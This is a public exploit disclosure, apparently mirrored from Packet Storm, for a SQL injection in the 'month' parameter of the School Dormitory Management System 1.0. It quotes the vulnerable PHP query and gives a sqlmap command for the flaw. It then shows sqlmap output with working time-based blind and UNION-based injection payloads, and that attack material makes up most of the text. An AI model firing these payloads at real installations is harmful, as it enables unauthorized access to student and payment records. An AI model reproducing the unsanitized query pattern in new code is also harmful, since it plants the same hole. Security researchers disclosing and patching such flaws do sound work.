Share
## https://sploitus.com/exploit?id=PACKETSTORM:167001
# Exploit Title: School Dormitory Management System - 'month' SQL Injection  
# Date: 08/05/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html  
# Version: 1.0  
# Tested on: XAMPP, Linux  
  
  
  
# Vulnerable Code  
  
line 59 in file "/dms/admin/reports/daily_collection_report.php"  
  
$qry = $conn->query("SELECT p.*, a.code, s.code as student_code, concat(s.firstname, ' ', coalesce(concat(s.middlename,' '), ''), s.lastname) as `student`, d.name as dorm, r.name as `room` from payment_list p inner join account_list a on p.account_id = a.id inner join student_list s on a.student_id = s.id inner join room_list r on a.room_id = r.id inner join dorm_list d on r.dorm_id = d.id where (p.month_of) = '{$month}' order by student asc ");  
  
# Sqlmap command:  
  
sqlmap -u "http://localhost/dms/admin/?month=1&page=reports/daily_collection_report" -p month --level=5 --risk=3 --dbs --random-agent --eta  
  
# Output:  
  
Parameter: month (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: month=1' AND (SELECT 3271 FROM (SELECT(SLEEP(5)))duQT) AND 'NgBP'='NgBP&page=reports/daily_collection_report  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 11 columns  
Payload: month=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6a71,0x485362486f7266597a444d417754744873427366706c4a4f706b7949467a6a61505468424c476753,0x716b6a7171),NULL,NULL,NULL,NULL-- -&page=reports/daily_collection_report